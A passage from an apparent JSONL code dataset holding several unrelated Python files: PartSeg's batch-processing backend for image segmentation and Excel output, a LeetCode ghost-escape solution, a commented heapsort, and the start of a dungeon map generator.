calc.do_calculation(FileCalculation(file_path, calculation))\n except Exception as e: # pylint: disable=broad-except\n return index, [prepare_error_data(e)]\n\n\nclass CalculationProcess:\n \"\"\"\n Main class to calculate PartSeg calculation plan.\n To support other operations overwrite :py:meth:`recursive_calculation`\n call super function to support already defined operations.\n \"\"\"\n\n def __init__(self):\n self.reused_mask = set()\n self.mask_dict = {}\n self.calculation = None\n self.measurement: List[MeasurementResult] = []\n self.image: Optional[Image] = None\n self.roi_info: Optional[ROIInfo] = None\n self.additional_layers: Dict[str, AdditionalLayerDescription] = {}\n self.mask: Optional[np.ndarray] = None\n self.history: List[HistoryElement] = []\n self.algorithm_parameters: dict = {}\n self.results: CalculationResultList = []\n\n def _reset_image_cache(self):\n self.image = None\n self.roi_info = None\n self.additional_layers = {}\n self.mask = None\n self.history = []\n self.algorithm_parameters = {}\n self.measurement = []\n self.reused_mask = set()\n\n @staticmethod\n def load_data(operation, calculation: FileCalculation) -> Union[ProjectTuple, List[ProjectTuple]]:\n metadata = {\"default_spacing\": calculation.voxel_size}\n ext = path.splitext(calculation.file_path)[1]\n if operation == RootType.Image:\n for load_class in load_dict.values():\n if load_class.partial() or load_class.number_of_files() != 1:\n continue\n if ext in load_class.get_extensions():\n return load_class.load([calculation.file_path], metadata=metadata)\n raise ValueError(\"File type not supported\")\n if operation == RootType.Project:\n return LoadProject.load([calculation.file_path], metadata=metadata)\n try:\n return LoadProject.load([calculation.file_path], metadata=metadata)\n except (KeyError, WrongFileTypeException):\n # TODO identify exceptions\n return LoadMaskSegmentation.load([calculation.file_path], metadata=metadata)\n\n def do_calculation(self, calculation: FileCalculation) -> CalculationResultList:\n \"\"\"\n Main function for calculation process\n\n :param calculation: calculation to do.\n :return:\n \"\"\"\n self.calculation = calculation\n self.reused_mask = calculation.calculation_plan.get_reused_mask()\n self.mask_dict = {}\n self.measurement = []\n self.results = []\n operation = calculation.calculation_plan.execution_tree.operation\n projects = self.load_data(operation, calculation)\n\n if 
isinstance(projects, ProjectTuple):\n projects = [projects]\n for project in projects:\n try:\n self.image = project.image\n if calculation.overwrite_voxel_size:\n self.image.set_spacing(calculation.voxel_size)\n if operation == RootType.Mask_project:\n self.mask = project.mask\n if operation == RootType.Project:\n self.mask = project.mask\n # FIXME when load annotation from project is done\n self.roi_info = project.roi_info\n self.additional_layers = project.additional_layers\n self.history = project.history\n self.algorithm_parameters = project.algorithm_parameters\n\n self.iterate_over(calculation.calculation_plan.execution_tree)\n for el in self.measurement:\n el.set_filename(path.relpath(project.image.file_path, calculation.base_prefix))\n self.results.append(\n ResponseData(path.relpath(project.image.file_path, calculation.base_prefix), self.measurement)\n )\n except Exception as e: # pylint: disable=broad-except\n self.results.append(prepare_error_data(e))\n self._reset_image_cache()\n return self.results\n\n def iterate_over(self, node: Union[CalculationTree, List[CalculationTree]]):\n \"\"\"\n Execute calculation on node children or list oof nodes\n\n :type node: CalculationTree\n :param node:\n :return:\n \"\"\"\n if isinstance(node, CalculationTree):\n node = node.children\n for el in node:\n self.recursive_calculation(el)\n\n def step_load_mask(self, operation: MaskMapper, children: List[CalculationTree]):\n \"\"\"\n Load mask using mask mapper (mask can be defined with suffix, substitution, or file with mapping saved,\n then iterate over ``children`` nodes.\n\n :param MaskMapper operation: operation to perform\n :param List[CalculationTree] children: list of nodes to iterate over with applied mask\n \"\"\"\n mask_path = operation.get_mask_path(self.calculation.file_path)\n if not mask_path: # pragma: no cover\n raise ValueError(\"Empty path to mask.\")\n if not os.path.exists(mask_path):\n raise OSError(f\"Mask file {mask_path} does not exists\")\n with tifffile.TiffFile(mask_path) as mask_file:\n mask = mask_file.asarray()\n mask = TiffImageReader.update_array_shape(mask, mask_file.series[0].axes)\n if \"C\" in TiffImageReader.image_class.axis_order:\n pos: List[Union[slice, int]] = [slice(None) for _ in range(mask.ndim)]\n pos[TiffImageReader.image_class.axis_order.index(\"C\")] = 0\n mask = mask[tuple(pos)]\n\n mask = (mask > 0).astype(np.uint8)\n try:\n mask = self.image.fit_array_to_image(mask)[0]\n # TODO fix this time bug fix\n except ValueError as e: # pragma: no cover\n raise ValueError(\"Mask do not fit to given image\") from e\n old_mask = self.mask\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_segmentation(self, operation: ROIExtractionProfile, children: List[CalculationTree]):\n \"\"\"\n Perform segmentation and iterate over ``children`` nodes\n\n :param ROIExtractionProfile operation: Specification of segmentation operation\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n segmentation_class = AnalysisAlgorithmSelection.get(operation.algorithm)\n if segmentation_class is None: # pragma: no cover\n raise ValueError(f\"Segmentation class {operation.algorithm} do not found\")\n segmentation_algorithm: RestartableAlgorithm = segmentation_class()\n segmentation_algorithm.set_image(self.image)\n segmentation_algorithm.set_mask(self.mask)\n if segmentation_algorithm.__new_style__:\n segmentation_algorithm.set_parameters(operation.values)\n else:\n 
segmentation_algorithm.set_parameters(**operation.values)\n result = segmentation_algorithm.calculation_run(report_empty_fun)\n backup_data = self.roi_info, self.additional_layers, self.algorithm_parameters\n self.roi_info = ROIInfo(result.roi, result.roi_annotation, result.alternative_representation)\n self.additional_layers = result.additional_layers\n self.algorithm_parameters = {\"algorithm_name\": operation.algorithm, \"values\": operation.values}\n self.iterate_over(children)\n self.roi_info, self.additional_layers, self.algorithm_parameters = backup_data\n\n def step_mask_use(self, operation: MaskUse, children: List[CalculationTree]):\n \"\"\"\n use already defined mask and iterate over ``children`` nodes\n\n :param MaskUse operation:\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n old_mask = self.mask\n mask = self.mask_dict[operation.name]\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_mask_operation(self, operation: Union[MaskSum, MaskIntersection], children: List[CalculationTree]):\n \"\"\"\n Generate new mask by sum or intersection of existing and iterate over ``children`` nodes\n\n :param operation: mask operation to perform\n :type operation: Union[MaskSum, MaskIntersection]\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n old_mask = self.mask\n mask1 = self.mask_dict[operation.mask1]\n mask2 = self.mask_dict[operation.mask2]\n if isinstance(operation, MaskSum):\n mask = np.logical_or(mask1, mask2).astype(np.uint8)\n else:\n mask = np.logical_and(mask1, mask2).astype(np.uint8)\n self.mask = mask\n self.iterate_over(children)\n self.mask = old_mask\n\n def step_save(self, operation: Save):\n \"\"\"\n Perform save operation selected in plan.\n\n :param Save operation: save definition\n \"\"\"\n save_class = save_dict[operation.algorithm]\n project_tuple = ProjectTuple(\n file_path=\"\",\n image=self.image,\n roi_info=self.roi_info,\n additional_layers=self.additional_layers,\n mask=self.mask,\n history=self.history,\n algorithm_parameters=self.algorithm_parameters,\n )\n save_path = get_save_path(operation, self.calculation)\n save_dir = os.path.dirname(save_path)\n os.makedirs(save_dir, exist_ok=True)\n save_class.save(save_path, project_tuple, operation.values)\n\n def step_mask_create(self, operation: MaskCreate, children: List[CalculationTree]):\n \"\"\"\n Create mask from current segmentation state using definition\n\n :param MaskCreate operation: mask create description.\n :param List[CalculationTree] children: list of nodes to iterate over after perform segmentation\n \"\"\"\n mask = calculate_mask(\n mask_description=operation.mask_property,\n roi=self.roi_info.roi,\n old_mask=self.mask,\n spacing=self.image.spacing,\n time_axis=self.image.time_pos,\n )\n if operation.name in self.reused_mask:\n self.mask_dict[operation.name] = mask\n history_element = HistoryElement.create(\n self.roi_info,\n self.mask,\n self.algorithm_parameters,\n operation.mask_property,\n )\n backup = self.mask, self.history\n self.mask = mask\n self.history.append(history_element)\n self.iterate_over(children)\n self.mask, self.history = backup\n\n def step_measurement(self, operation: MeasurementCalculate):\n \"\"\"\n Calculate measurement defined in current operation.\n\n :param MeasurementCalculate operation: definition of measurement to calculate\n \"\"\"\n channel = operation.channel\n if channel == -1:\n segmentation_class: 
Type[ROIExtractionAlgorithm] = AnalysisAlgorithmSelection.get(\n self.algorithm_parameters[\"algorithm_name\"]\n )\n if segmentation_class is None: # pragma: no cover\n raise ValueError(f\"Segmentation class {self.algorithm_parameters['algorithm_name']} do not found\")\n if segmentation_class.__new_style__:\n channel = getattr(self.algorithm_parameters[\"values\"], segmentation_class.get_channel_parameter_name())\n else:\n channel = self.algorithm_parameters[\"values\"][segmentation_class.get_channel_parameter_name()]\n\n # FIXME use additional information\n old_mask = self.image.mask\n self.image.set_mask(self.mask)\n measurement = operation.measurement_profile.calculate(\n self.image,\n channel,\n self.roi_info,\n operation.units,\n )\n self.measurement.append(measurement)\n self.image.set_mask(old_mask)\n\n def recursive_calculation(self, node: CalculationTree):\n \"\"\"\n Identify node type and then call proper ``step_*`` function\n\n :param CalculationTree node: Node to be proceed\n \"\"\"\n if isinstance(node.operation, MaskMapper):\n self.step_load_mask(node.operation, node.children)\n elif isinstance(node.operation, ROIExtractionProfile):\n self.step_segmentation(node.operation, node.children)\n elif isinstance(node.operation, MaskUse):\n self.step_mask_use(node.operation, node.children)\n elif isinstance(node.operation, (MaskSum, MaskIntersection)):\n self.step_mask_operation(node.operation, node.children)\n elif isinstance(node.operation, Save):\n self.step_save(node.operation)\n elif isinstance(node.operation, MaskCreate):\n self.step_mask_create(node.operation, node.children)\n elif isinstance(node.operation, Operations): # pragma: no cover\n # backward compatibility\n self.iterate_over(node)\n elif isinstance(node.operation, MeasurementCalculate):\n self.step_measurement(node.operation)\n else: # pragma: no cover\n raise ValueError(f\"Unknown operation {type(node.operation)} {node.operation}\")\n\n\nclass BatchResultDescription(NamedTuple):\n \"\"\"\n Tuple to handle information about part of calculation result.\n \"\"\"\n\n errors: List[Tuple[str, ErrorInfo]] #: list of errors occurred during calculation\n global_counter: int #: total number of calculated steps\n jobs_status: Dict[uuid.UUID, int] #: for each job information about progress\n\n\nclass CalculationManager:\n \"\"\"\n This class manage batch processing in PartSeg.\n\n \"\"\"\n\n def __init__(self):\n self.batch_manager = BatchManager()\n self.calculation_queue = Queue()\n self.calculation_dict: Dict[uuid.UUID, Calculation] = OrderedDict()\n self.calculation_sizes = []\n self.calculation_size = 0\n self.calculation_done = 0\n self.counter_dict = OrderedDict()\n self.errors_list = []\n self.writer = DataWriter()\n\n def is_valid_sheet_name(self, excel_path: str, sheet_name: str) -> bool:\n \"\"\"\n Check if sheet name can be used\n\n :param str excel_path: path which allow identify excel file\n :param str sheet_name: name of excel sheet\n :return:\n :rtype: bool\n \"\"\"\n return self.writer.is_empty_sheet(excel_path, sheet_name)\n\n def remove_calculation(self, calculation: Calculation):\n size = len(calculation.file_list)\n self.calculation_size -= size\n self.writer.remove_data_part(calculation)\n\n def cancel_calculation(self, calculation: Calculation):\n self.batch_manager.cancel_work(calculation)\n\n def add_calculation(self, calculation: Calculation):\n \"\"\"\n :param calculation: Calculation\n \"\"\"\n self.calculation_dict[calculation.uuid] = calculation\n self.counter_dict[calculation.uuid] = 0\n size = 
len(calculation.file_list)\n self.calculation_sizes.append(size)\n self.calculation_size += size\n self.batch_manager.add_work(\n list(enumerate(calculation.file_list)), calculation.get_base_calculation(), do_calculation\n )\n self.writer.add_data_part(calculation)\n\n @property\n def has_work(self) -> bool:\n \"\"\"\n Is still some calculation or data writing in progress\n \"\"\"\n return self.batch_manager.has_work or not self.writer.writing_finished()\n\n def kill_jobs(self):\n self.batch_manager.kill_jobs()\n\n def set_number_of_workers(self, val: int):\n \"\"\"\n Set number of workers to perform calculation.\n\n :param int val: number of workers.\n \"\"\"\n logging.debug(\"Number off process %s\", val)\n self.batch_manager.set_number_of_process(val)\n\n def get_results(self) -> BatchResultDescription:\n \"\"\"\n Consume results from :py:class:`BatchWorker` and transfer it to :py:class:`DataWriter`\n\n :return: information about calculation status\n :rtype: BatchResultDescription\n \"\"\"\n responses: List[Tuple[uuid.UUID, WrappedResult]] = self.batch_manager.get_result()\n new_errors: List[Tuple[str, ErrorInfo]] = []\n for uuid_id, (ind, result_list) in responses:\n self.calculation_done += 1\n self.counter_dict[uuid_id] += 1\n calculation = self.calculation_dict[uuid_id]\n for el in result_list:\n if isinstance(el, ResponseData):\n errors = self.writer.add_result(el, calculation, ind=ind)\n new_errors.extend((el.path_to_file, err) for err in errors)\n elif el != SubprocessOrder.cancel_job:\n file_info = calculation.file_list[ind] if ind != -1 else \"unknown file\"\n self.writer.add_calculation_error(calculation, file_info, el[0])\n self.errors_list.append((file_info, el))\n new_errors.append((file_info, el))\n\n if self.counter_dict[uuid_id] == len(calculation.file_list):\n errors = self.writer.calculation_finished(calculation)\n new_errors.extend((\"\", err) for err in errors)\n return BatchResultDescription(new_errors, self.calculation_done, self.counter_dict.copy())\n\n\nclass FileType(Enum):\n excel_xlsx_file = 1\n excel_xls_file = 2\n text_file = 3\n\n\nclass SheetData:\n \"\"\"\n Store single sheet information\n \"\"\"\n\n def __init__(self, name: str, columns: List[Tuple[str, str]], raw=False):\n if len(columns) != len(set(columns)):\n raise ValueError(f\"Columns should be unique: {columns}\")\n self.name = name\n if raw:\n self.columns = pd.MultiIndex.from_tuples(columns)\n else:\n self.columns = pd.MultiIndex.from_tuples([(\"name\", \"units\"), *columns])\n self.data_frame = pd.DataFrame([], columns=self.columns)\n self.row_list: List[Any] = []\n\n def add_data(self, data, ind):\n if len(data) != len(self.columns):\n raise ValueError(\n f\"Wrong number of columns in data ({len(data)} instead of \"\n f\"{len(self.columns)} {data} for columns {self.columns.values}\"\n )\n if ind is None:\n ind = len(self.row_list)\n self.row_list.append((ind, data))\n\n def add_data_list(self, data, ind):\n if ind is None:\n ind = len(self.row_list)\n for x in data:\n self.add_data(x, ind)\n\n def get_data_to_write(self) -> Tuple[str, pd.DataFrame]:\n \"\"\"\n Get data for write\n\n :return: sheet name and data to write\n :rtype: Tuple[str, pd.DataFrame]\n \"\"\"\n sorted_row = [x[1] for x in sorted(self.row_list)]\n df = pd.DataFrame(sorted_row, columns=self.columns)\n df2 = pd.concat((self.data_frame, df), axis=0)\n self.data_frame = df2.reset_index(drop=True)\n self.row_list = []\n return self.name, self.data_frame\n\n def __repr__(self):\n return f\"SheetData(name={self.name}, 
columns{list(self.columns)[1:]}, wait_rows={len(self.row_list)})\"\n\n\nclass FileData:\n \"\"\"\n Handle information about single file.\n\n This class run separate thread for writing purpose.\n This need additional synchronisation. but not freeze\n\n :param BaseCalculation calculation: calculation information\n :param int write_threshold: every how many lines of data are written to disk\n :cvar component_str: separator for per component sheet information\n \"\"\"\n\n component_str = \"_comp_\" #: separator for per component sheet information\n\n def __init__(self, calculation: BaseCalculation, write_threshold: int = 40):\n \"\"\"\n :param BaseCalculation calculation: calculation information\n :param int write_threshold: every how many lines of data are written to disk\n \"\"\"\n self.file_path = calculation.measurement_file_path\n ext = path.splitext(calculation.measurement_file_path)[1]\n if ext == \".xlsx\":\n self.file_type = FileType.excel_xlsx_file\n elif ext == \".xls\": # pragma: no cover\n self.file_type = FileType.excel_xls_file\n else: # pragma: no cover\n self.file_type = FileType.text_file\n self.writing = False\n data = SheetData(\"calculation_info\", [(\"Description\", \"str\"), (\"JSON\", \"str\")], raw=True)\n data.add_data(\n [str(calculation.calculation_plan), json.dumps(calculation.calculation_plan, cls=PartSegEncoder)], 0\n )\n self.sheet_dict = {}\n self.calculation_info = {}\n self.sheet_set = {\"Errors\"}\n self.new_count = 0\n self.write_threshold = write_threshold\n self.wrote_queue = Queue()\n self.error_queue = Queue()\n self.write_thread = threading.Thread(target=self.wrote_data_to_file)\n self.write_thread.daemon = True\n self.write_thread.start()\n self._error_info = []\n self.add_data_part(calculation)\n\n def finished(self):\n \"\"\"check if any data wait on write to disc\"\"\"\n return not self.writing and self.wrote_queue.empty()\n\n def good_sheet_name(self, name: str) -> Tuple[bool, str]:\n \"\"\"\n Check if sheet name can be used in current file.\n Return False if:\n\n * file is text file\n * contains :py:attr:`component_str` in name\n * name is already in use\n\n :param str name: sheet name\n :return: if can be used and error message\n \"\"\"\n if self.file_type == FileType.text_file:\n return False, \"Text file allow store only one sheet\"\n if self.component_str in name:\n return False, f\"Sequence '{FileData.component_str}' is reserved for auto generated sheets\"\n if name in self.sheet_set:\n return False, f\"Sheet name {name} already in use\"\n return True, \"\"\n\n def remove_data_part(self, calculation: BaseCalculation):\n if calculation.uuid in self.sheet_dict:\n sheet_list = self.sheet_dict[calculation.uuid][1]\n for sheet in sheet_list:\n if sheet is None:\n continue\n self.sheet_set.remove(sheet.name)\n self.sheet_set.remove(calculation.sheet_name)\n del self.sheet_dict[calculation.uuid]\n\n if calculation.uuid in self.calculation_info:\n del self.calculation_info[calculation.uuid]\n\n def add_data_part(self, calculation: BaseCalculation):\n \"\"\"\n Add new calculation which result will be stored in handled file.\n\n :param BaseCalculation calculation: information about calculation\n :raises ValueError: when :py:attr:`measurement_file_path` is different to handled file\n or :py:attr:`sheet_name` name already is in use.\n \"\"\"\n if calculation.measurement_file_path != self.file_path:\n raise ValueError(f\"[FileData] different file path {calculation.measurement_file_path} vs {self.file_path}\")\n if calculation.sheet_name in 
self.sheet_set: # pragma: no cover\n raise ValueError(f\"[FileData] sheet name {calculation.sheet_name} already in use\")\n measurement = calculation.calculation_plan.get_measurements()\n component_information = [x.measurement_profile.get_component_info(x.units) for x in measurement]\n num = 1\n sheet_list = []\n header_list = []\n main_header = []\n for i, el in enumerate(component_information):\n local_header = []\n component_seg = has_roi_components(measurement[i].measurement_profile.get_component_and_area_info())\n component_mask = has_mask_components(measurement[i].measurement_profile.get_component_and_area_info())\n if component_seg:\n local_header.append((\"Segmentation component\", \"num\"))\n if component_mask:\n local_header.append((\"Mask component\", \"num\"))\n if any(x[1] for x in el):\n sheet_list.append(\n f\"{calculation.sheet_name}{FileData.component_str}{num} - \"\n f\"{measurement[i].name_prefix + measurement[i].name}\"\n )\n\n num += 1\n else:\n sheet_list.append(None)\n for name, comp in el:\n local_header.append(name)\n if not comp:\n main_header.append(name)\n header_list.append(local_header)\n\n self.sheet_dict[calculation.uuid] = (\n SheetData(calculation.sheet_name, main_header),\n [SheetData(name, header_list[i]) if name is not None else None for i, name in enumerate(sheet_list)],\n component_information,\n )\n self.sheet_set.add(calculation.sheet_name)\n self.sheet_set.update(sheet_list)\n self.calculation_info[calculation.uuid] = calculation.calculation_plan\n\n def wrote_data(self, uuid_id: uuid.UUID, data: ResponseData, ind: Optional[int] = None):\n \"\"\"\n Add information to be stored in output file\n\n :param uuid.UUID uuid_id: calculation identifier\n :param ResponseData data: calculation result\n :param Optional[int] ind: element index\n \"\"\"\n self.new_count += 1\n main_sheet, component_sheets, _component_information = self.sheet_dict[uuid_id]\n name = data.path_to_file\n data_list = [name]\n for el, comp_sheet in zip(data.values, component_sheets):\n data_list.extend(el.get_global_parameters()[1:])\n comp_list = el.get_separated()\n if comp_sheet is not None:\n comp_sheet.add_data_list(comp_list, ind)\n main_sheet.add_data(data_list, ind)\n if self.new_count >= self.write_threshold:\n self.dump_data()\n self.new_count = 0\n\n def wrote_errors(self, file_path, error_description):\n self.new_count += 1\n self._error_info.append((file_path, str(error_description)))\n\n def dump_data(self):\n \"\"\"\n Fire writing data to disc\n \"\"\"\n data = []\n for main_sheet, component_sheets, _ in self.sheet_dict.values():\n data.append(main_sheet.get_data_to_write())\n data.extend(sheet.get_data_to_write() for sheet in component_sheets if sheet is not None)\n\n self.wrote_queue.put((data, list(self.calculation_info.values()), self._error_info[:]))\n\n def wrote_data_to_file(self):\n \"\"\"\n Main function to write data to hard drive.\n It is executed in separate thread.\n \"\"\"\n while True:\n data = self.wrote_queue.get()\n if data == \"finish\":\n break\n self.writing = True\n try:\n if self.file_type == FileType.text_file:\n base_path, ext = path.splitext(self.file_path)\n for sheet_name, data_frame in data[0]:\n data_frame.to_csv(f\"{base_path}_{sheet_name}{ext}\")\n continue\n file_path = self.file_path\n i = 0\n while i < 100:\n i += 1\n try:\n self.write_to_excel(file_path, data)\n break\n except OSError:\n base, ext = path.splitext(self.file_path)\n file_path = f\"{base}({i}){ext}\"\n if i == 100: # pragma: no cover\n raise PermissionError(f\"Fail to 
write result excel {self.file_path}\")\n except Exception as e: # pragma: no cover # pylint: disable=broad-except\n logging.error(\"[batch_backend] %s\", e)\n self.error_queue.put(prepare_error_data(e))\n finally:\n self.writing = False\n\n @classmethod\n def write_to_excel(\n cls, file_path: str, data: Tuple[List[Tuple[str, pd.DataFrame]], List[CalculationPlan], List[Tuple[str, str]]]\n ):\n with pd.ExcelWriter(file_path) as writer: # pylint: disable=abstract-class-instantiated\n new_sheet_names = []\n ind = 0\n sheets, plans, errors = data\n for sheet_name, _ in sheets:\n if len(sheet_name) < 32:\n new_sheet_names.append(sheet_name)\n else:\n new_sheet_names.append(f\"{sheet_name[:27]}_{ind}_\")\n ind += 1\n for sheet_name, (_, data_frame) in zip(new_sheet_names, sheets):\n data_frame.to_excel(writer, sheet_name=sheet_name)\n sheet = writer.book.sheetnames[sheet_name]\n sheet.set_column(1, 1, 10)\n for i, (text, _unit) in enumerate(data_frame.columns[1:], start=2):\n sheet.set_column(i, i, len(text) + 1)\n\n for calculation_plan in plans:\n cls.write_calculation_plan(writer, calculation_plan)\n\n if errors:\n errors_data = pd.DataFrame(errors, columns=[\"File path\", \"error description\"])\n errors_data.to_excel(writer, \"Errors\")\n\n @staticmethod\n def write_calculation_plan(writer: pd.ExcelWriter, calculation_plan: CalculationPlan):\n book: xlsxwriter.Workbook = writer.book\n sheet_name = iterate_names(f\"info {calculation_plan.name}\"[:30], book.sheetnames, 30)\n if sheet_name is None: # pragma: no cover\n raise ValueError(\n \"Name collision in sheets with information about calculation \"\n f\"plan: {f'info {calculation_plan.name}'[:30]}\"\n )\n\n sheet = book.add_worksheet(sheet_name)\n cell_format = book.add_format({\"bold\": True})\n sheet.write(\"A1\", \"Plan Description\", cell_format)\n sheet.write(\"B1\", \"Plan JSON\", cell_format)\n sheet.write(\"C1\", \"Plan JSON (readable)\", cell_format)\n description = calculation_plan.pretty_print().split(\"\\n\")\n for i in range(math.ceil(len(description) / MAX_ROWS_IN_EXCEL_CELL)):\n to_write = description[i * MAX_ROWS_IN_EXCEL_CELL : (i + 1) * MAX_ROWS_IN_EXCEL_CELL]\n sheet.write(f\"A{i+2}\", \"\\n\".join(to_write))\n sheet.set_row(i + 1, len(to_write) * 11 + 10)\n\n sheet.set_column(0, 0, max(map(len, description)))\n sheet.set_column(1, 1, 15)\n calculation_plan_str = json.dumps(calculation_plan, cls=PartSegEncoder)\n for i in range(math.ceil(len(calculation_plan_str) / MAX_CHAR_IN_EXCEL_CELL)):\n sheet.write(f\"B{i+2}\", calculation_plan_str[i * MAX_CHAR_IN_EXCEL_CELL : (i + 1) * MAX_CHAR_IN_EXCEL_CELL])\n\n calculation_plan_pretty = json.dumps(calculation_plan, cls=PartSegEncoder, indent=2).split(\"\\n\")\n for i in range(math.ceil(len(calculation_plan_pretty) / MAX_ROWS_IN_EXCEL_CELL)):\n to_write = calculation_plan_pretty[i * MAX_ROWS_IN_EXCEL_CELL : (i + 1) * MAX_ROWS_IN_EXCEL_CELL]\n sheet.write(f\"C{i+2}\", \"\\n\".join(to_write))\n sheet.set_row(i + 1, len(to_write) * 11 + 10)\n\n sheet.set_column(2, 2, max(map(len, calculation_plan_pretty)))\n\n def get_errors(self) -> List[ErrorInfo]:\n \"\"\"\n Get list of errors occurred in last write\n \"\"\"\n res = []\n while not self.error_queue.empty():\n res.append(self.error_queue.get())\n return res\n\n def finish(self):\n self.wrote_queue.put(\"finish\")\n\n def is_empty_sheet(self, sheet_name) -> bool:\n return self.good_sheet_name(sheet_name)[0]\n\n\nclass DataWriter:\n \"\"\"\n Handle information\n \"\"\"\n\n def __init__(self):\n self.file_dict: Dict[str, FileData] = 
{}\n\n    def is_empty_sheet(self, file_path: str, sheet_name: str) -> bool:\n        \"\"\"\n        Check if given pair of `file_path` and `sheet_name` can be used.\n\n        :param str file_path: path to file to store measurement result\n        :param str sheet_name: Name of excel sheet in which data will be stored\n        :return: If calling :py:meth:`FileData.add_data_part` finishes without error.\n        :rtype: bool\n        \"\"\"\n        if FileData.component_str in sheet_name:\n            return False\n        if file_path not in self.file_dict:\n            return True\n        return self.file_dict[file_path].is_empty_sheet(sheet_name)\n\n    def add_data_part(self, calculation: BaseCalculation):\n        \"\"\"\n        Add information about calculation\n        \"\"\"\n        if calculation.measurement_file_path in self.file_dict:\n            self.file_dict[calculation.measurement_file_path].add_data_part(calculation)\n        else:\n            self.file_dict[calculation.measurement_file_path] = FileData(calculation)\n\n    def remove_data_part(self, calculation: BaseCalculation):\n        if calculation.measurement_file_path in self.file_dict:\n            self.file_dict[calculation.measurement_file_path].remove_data_part(calculation)\n\n    def add_result(\n        self, data: ResponseData, calculation: BaseCalculation, ind: Optional[int] = None\n    ) -> List[ErrorInfo]:\n        \"\"\"\n        Add calculation result to file writer\n\n        :raises ValueError: when calculation.measurement_file_path is not added with :py:meth:`.add_data_part`\n        \"\"\"\n        if calculation.measurement_file_path not in self.file_dict:\n            raise ValueError(\"Unknown measurement file\")\n        file_writer = self.file_dict[calculation.measurement_file_path]\n        file_writer.wrote_data(calculation.uuid, data, ind)\n        return file_writer.get_errors()\n\n    def add_calculation_error(self, calculation: BaseCalculation, file_path: str, error):\n        file_writer = self.file_dict[calculation.measurement_file_path]\n        file_writer.wrote_errors(file_path, error)\n\n    def writing_finished(self) -> bool:\n        \"\"\"check if all data are written to disc\"\"\"\n        return all(x.finished() for x in self.file_dict.values())\n\n    def finish(self):\n        \"\"\"close all files\"\"\"\n        for file_data in self.file_dict.values():\n            file_data.finish()\n\n    def calculation_finished(self, calculation) -> List[ErrorInfo]:\n        \"\"\"\n        Force write data for given calculation.\n\n        :raises ValueError: when measurement is not added with :py:meth:`.add_data_part`\n        :return: list of errors during write.\n        \"\"\"\n        if calculation.measurement_file_path not in self.file_dict:\n            raise ValueError(\"Unknown measurement file\")\n        self.file_dict[calculation.measurement_file_path].dump_data()\n        return self.file_dict[calculation.measurement_file_path].get_errors()\n","sub_path":"package/PartSegCore/analysis/batch_processing/batch_backend.py","file_name":"batch_backend.py","file_ext":"py","file_size_in_byte":39024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"650749360","text":"class Solution:\n    def escapeGhosts(self, ghosts, target):\n        \"\"\"\n        :type ghosts: List[List[int]]\n        :type target: List[int]\n        :rtype: bool\n        \"\"\"\n        # The player escapes iff they reach the target strictly before every\n        # ghost can (Manhattan distance, since everyone moves one step per turn).\n        my_dist = abs(target[0]) + abs(target[1])\n        return all(abs(target[0] - x) + abs(target[1] - y) > my_dist for x, y in ghosts)\n\n\nif __name__ == '__main__':\n    s = Solution()\n    ghosts = [[2, 0]]\n    target = [1, 0]\n    print(s.escapeGhosts(ghosts, target))\n","sub_path":"0789-Escape The Ghosts.py","file_name":"0789-Escape The Ghosts.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"366312262","text":"
#Heapsort\n# A tricky sorting algorithm\n# You have to put all the different items into a heap, a kind of\n# binary tree, with the parent of an item always larger than the children\n# you put the children at positions 2k and 2k+1, while leaving the larger one\n# at position k. You need to define a few things for this: you must be able to\n# let elements swim up, but also let elements sink down.\ndef sink(rij,start,end):\n    \"\"\"Let the element at the given position sink down in the tree\"\"\"\n    root = start\n    while root*2+1<=end:\n        child = root*2+1\n        if child+1<=end and rij[child]<rij[child+1]:\n            child+=1\n        if rij[root]<rij[child]:\n            exchange(root,child,rij)\n            root = child\n        else:\n            return\n\ndef exchange(i,j,rij):\n    \"\"\"Swap the elements at positions i and j\"\"\"\n    rij[i],rij[j] = rij[j],rij[i]\n\ndef heapsort(rij):\n    create_heap(rij)\n    end = len(rij)-1\n    while end>0:\n        exchange(end,0,rij)\n        sink(rij,0,end-1)\n        end-=1\n\ndef create_heap(rij):\n    #Build the heap\n    start = (len(rij)-2)//2\n    while start>=0:\n        sink(rij,start,len(rij)-1)\n        start-=1\n
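\n# Minimal usage sketch of the functions above (illustrative): heapsort sorts\n# a list in place in ascending order.\nif __name__ == '__main__':\n    data = [5, 1, 4, 2, 8]\n    heapsort(data)\n    print(data)  # -> [1, 2, 4, 5, 8]\n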
","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"527623026","text":"__author__ = 'Anton Firsov'\n\nfrom random import randrange, choice, randint\nimport locations\n\n\nclass MyMap:\n    def __init__(self, level):\n        '''\n        Constructor\n        '''\n\n        self.map_arr = [] # list of the map\n        self.room_list = [] # list of existing rooms\n        self.map_level = level # level the map belongs to\n\n        self.__room_type_list = ['corridor', 'room'] # available types of rooms\n        self.Walls = []\n        self.__room_size = 0\n\n    def make_map(self, w, h):\n        '''\n        creates the map, main method of the class\n        :param w: map width, number of tiles by x\n        :param h: map height, number of tiles by y\n        :return:\n        '''\n\n        self.map_arr = [] # why again? the constructor already does this\n\n        self.__map_width = w\n        self.__map_height = h\n\n        for y in range(h): # fill the map with walls\n            self.map_arr.append([])\n            for x in range(w):\n                self.map_arr[y].append(2)\n\n        if len(self.room_list) == 0: # if there are no rooms, time to add the first one\n            if self.map_level == 0: # if level is 0, time to add entrance hall\n                room_space = locations.entranceHall() # import location\n                self.place_room(room_space, 5, 1) # place location\n            else:\n                room_space = self.make_room(rType='room')\n                self.place_room(room_space, 0, 0)\n\n        err_count = 0\n\n        '''while True:\n            room_w, room_h = self.make_room(rType='room')\n            if self.place_room(room_w, room_h, 0, 0) == False:\n                err_count = err_count + 1\n            if err_count > 15:\n                break'''\n\n        # while len(self.room_list) < 6:\n        # while self.__room_size < (self.__map_width*self.__map_height)*0.7:\n        while 